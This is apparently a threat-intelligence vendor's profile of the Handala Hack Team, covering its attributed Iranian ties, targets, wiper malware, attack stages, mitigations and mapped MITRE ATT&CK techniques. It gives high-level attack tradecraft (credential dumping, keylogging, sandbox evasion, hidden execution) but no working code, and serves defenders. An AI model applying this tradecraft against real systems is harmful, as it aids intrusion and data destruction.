Threat Actor Profile: Handala Hack Team

Overview 

The Handala Hack Team emerged in late 2023 and has since evolved into a disruptive and highly visible cyber threat actor, primarily targeting Israeli interests and organizations linked to them. Although the group publicly presents itself as a pro-Palestinian hacktivist collective, multiple intelligence assessments attribute its operations to Iran’s Ministry of Intelligence and Security (MOIS).

Handala operates across a wide range of online platforms, including Telegram, Tox, X (formerly Twitter), and underground forums, where it rapidly claims responsibility for cyber incidents and amplifies psychological impact. Its operations are characterized less by financial motivation and more by disruption, signaling, and reputational damage.

A defining trait of the group is its reliance on destructive malware (wipers) rather than ransomware. Instead of monetizing access, Handala focuses on permanently erasing data, disrupting operations, and, in some cases, exposing sensitive information to increase pressure on victims.

Emergence and Evolution 

Handala first appeared in December 2023, initially conducting operations aligned with regional geopolitical tensions in the Middle East. Over time, the group has expanded both its technical capabilities and operational scope. 

Its campaigns reflect coordination and planning consistent with state-aligned activity. The group has demonstrated the ability to: 

• Maintain persistent access within target environments  

• Conduct staged attacks combining reconnaissance, lateral movement, and destruction  

• Synchronize cyber operations with geopolitical developments  

A notable example of its evolution was Operation “HamsaUpdate,” where the group deployed Linux-targeting wiper malware disguised as legitimate software updates, indicating growing cross-platform capabilities. 

Relationship to Other Threat Actors 

Handala is widely believed to be part of a broader ecosystem of Iranian cyber operations. Intelligence reporting links it to clusters such as: 

• Void Manticore  

• MuddyWater  

These overlaps include: 

• Shared tooling and malware families  

• Similar intrusion techniques and infrastructure usage  

• Alignment in targeting priorities and messaging  

This suggests Handala may function as a front-facing persona designed for public attribution and psychological operations, while more established threat clusters support underlying capabilities. 

Targeting Profile 

Handala’s operations are primarily focused on Israel, while also extending to organizations with business, political, or defense-related ties to the country, as well as to select Western entities, particularly in the United States. 

Cyble has tracked the threat actor showing interest in industries where disruption can create a significant impact, including IT & ITES, government & LEA, energy & utilities, healthcare, and manufacturing.  

Additionally, over 100 confirmed or claimed companies have been claimed by the threat actor, targeting organizations in Israel, the United States, the United Kingdom, the United Arab Emirates, and Iran.   

Notably, even indirect connections, such as partnerships or acquisitions involving Israeli firms, have been enough to bring organizations within Handala’s scope of interest. 

Malware and Tooling 

• Handala Wiper: A destructive Windows-based malware designed to overwrite the Master Boot Record (MBR) and delete files across infected systems. It is often deployed at scale using centralized management mechanisms such as scheduled tasks and Group Policy. 

• Hamsa Wiper: A Linux-focused wiper that masquerades as legitimate software updates. It incorporates delayed execution and system profiling to evade detection before initiating destructive actions. The malware can also transmit operational data back to attacker-controlled channels via Telegram. 

• Hatef Wiper: A data destruction tool targeting critical system directories. It systematically removes files and reports execution metrics, such as system identity and deletion status, to operators in real time. 

• Handala Loader: A supporting component used to deliver payloads and facilitate execution across compromised environments. 

Cross-Platform Capabilities 

Handala’s tooling demonstrates increasing maturity through: 

• Support for both Windows and Linux environments  

• Modular payload deployment  

• Integration with cloud-managed systems  

This flexibility enables the group to target diverse enterprise environments, including hybrid and cloud-based infrastructures. 

Technical Behavior 

Handala’s attack lifecycle is structured and deliberate, typically unfolding in multiple stages: 

Initial Access 

• Exploitation of exposed services (VPNs, web servers)  

• Use of compromised credentials  

• Phishing campaigns impersonating trusted software or institutions  

Lateral Movement and Persistence 

• Use of native administrative tools (“living off the land”)  

• Deployment via scheduled tasks and remote management services  

• Abuse of enterprise management platforms such as Microsoft Intune  

Defense Evasion 

• Obfuscation of payloads and scripts  

• Sandbox and virtualization detection  

• Concealment of execution windows and artifacts  

Destructive Phase 

• Deployment of wiper malware across endpoints  

• Overwriting system components and deleting critical files  

• In some cases, coordinated wiping of thousands of devices simultaneously  

Impact Amplification 

• Immediate public claims via social media  

• Release or threat of releasing stolen data  

• Psychological operations targeting victims and authorities  

Associated Threat Activity 

Handala has been linked to several high-impact incidents, including attacks on Israeli infrastructure and international organizations. 

One of the most notable campaigns involved the global medical technology firm Stryker Corporation, where the group claimed widespread system disruption and data exfiltration. While the full extent of the damage remains contested, the incident demonstrated Handala’s ability to affect large-scale enterprise environments. 

The group has also been associated with: 

• Data leaks involving sensitive personnel information  

• Disruption of industrial and governmental systems  

• Coordinated “hack-and-leak” operations  

Moreover, following an FBI-led seizure of domains linked to the group and its alleged ties to Iran’s MOIS, Handala quickly re-established its online presence via new infrastructure and publicly acknowledged the takedown. 

Operational Tradecraft 

Handala relies heavily on stealth and system-native tools to execute operations. 

Execution Techniques 

• PowerShell and command-line interpreters  

• Windows Management Instrumentation (WMI)  

• Remote service execution mechanisms  

Persistence Mechanisms 

• Scheduled tasks  

• Domain account creation  

• Registry modifications  

Defense Evasion 

• File and command obfuscation  

• Hidden execution windows  

• Artifact concealment within legitimate system processes  

These techniques align closely with frameworks such as MITRE ATT&CK, indicating a mature and structured operational approach. 

Strategic Assessment 

Handala represents a hybrid threat actor, blending hacktivist messaging with state-aligned capabilities. Key characteristics include: 

• Strong alignment with geopolitical objectives  

• Emphasis on destruction over monetization  

• Integration of cyber operations with information warfare  

• Rapid adaptation to infrastructure disruptions (e.g., domain seizures)  

The group’s ability to quickly rebuild infrastructure and maintain visibility suggests a resilient operational model supported by external resources. 

Conclusion 

Handala is a hybrid threat actor combining hacktivist messaging with state-aligned capabilities, prioritizing destructive impact, psychological operations, and geopolitical objectives over financial gain.  

Its resilience, rapid infrastructure recovery, and coordinated campaigns indicate strong external support, making it a credible threat to organizations linked to Israel or its allies. To stay ahead of such actors, organizations can leverage Cyble for real-time, AI-driven threat intelligence, and schedule a demo to strengthen proactive defense. 

Recommendations and Mitigation Strategies 

• Maintain segmented and offline backups to mitigate destructive attacks. 

• Enforce multi-factor authentication (MFA) across all access points. 

• Monitor and restrict administrative tools and remote execution frameworks. 

• Harden endpoint and cloud management platforms (e.g., Intune). 

• Detect anomalous use of scripting environments such as PowerShell. 

• Implement network segmentation to limit lateral movement. 

• Leverage threat intelligence feeds for early detection of emerging campaigns. 

MITRE ATT&CK Techniques Associated with the Handala Hack Team 

• Windows Management Instrumentation (T1047 | Execution): Used WMI to execute malicious commands locally or remotely via DCOM (port 135) or WinRM (ports 5985/5986). Enabled discovery, remote execution, and lateral movement across systems.  

• Command and Scripting Interpreter (T1059 | Execution): Leveraged PowerShell, cmd, Python, JavaScript, or other interpreters to run commands and payloads. Supported execution via initial access files, C2-delivered scripts, interactive shells, and remote services.  

• Obfuscated Files or Information (T1027 | Defense Evasion): Encoded, encrypted, compressed, or split payloads to evade detection. Hid strings, required user interaction (e.g., passwords), and used command obfuscation to bypass security controls.  

• Virtualization/Sandbox Evasion (T1497 | Defense Evasion/Discovery): Detected virtual or sandbox environments by checking system artifacts or user activity. Delayed execution, altered behavior, or avoided payload deployment when analysis environments were identified.  

• Hide Artifacts (T1564 | Defense Evasion): Concealed files, directories, user accounts, and system activity using OS features or isolated environments to evade detection and forensic analysis.  

• Hidden Window (T1564.003 | Defense Evasion): Executed processes with hidden windows (e.g., PowerShell hidden mode) to avoid user visibility. Used OS and scripting features to conceal malicious activity.  

• OS Credential Dumping (T1003 | Credential Access): Extracted credentials (hashes or plaintext) from the OS or memory to enable lateral movement and access to restricted systems.  

• Input Capture (T1056 | Credential Access/Collection): Captured user input through deceptive prompts or background monitoring to obtain credentials and sensitive information.  

• Keylogging (T1056.001 | Credential Access/Collection): Logged keystrokes via API hooks, hardware access, registry changes, or drivers to capture credentials. Sometimes forced reauthentication (e.g., clearing cookies) to increase success.  

• Unsecured Credentials (T1552 | Credential Access): Searched systems for credentials stored insecurely in plaintext files, configs, or application data.  

• Credentials in Registry (T1552.002 | Credential Access): Queried Windows Registry (HKLM/HKCU) to locate stored credentials used by applications or for auto-logon.  

• System Network Configuration Discovery (T1016 | Discovery): Collected network details such as IP, MAC, routes, and interfaces using tools like ipconfig, arp, nbtstat, and route to map the environment.  

• System Location Discovery (T1614 | Discovery): Identified host geographic or regional info using timezone, language, keyboard settings, API calls, or IP geolocation to guide attack decisions.  

• Input Capture (T1056 | Collection): Captured user inputs during normal activity or via deception to gather credentials and sensitive data.  

• Keylogging (T1056.001 | Collection): Recorded keystrokes over time to collect credentials and user activity, especially when other credential access methods failed.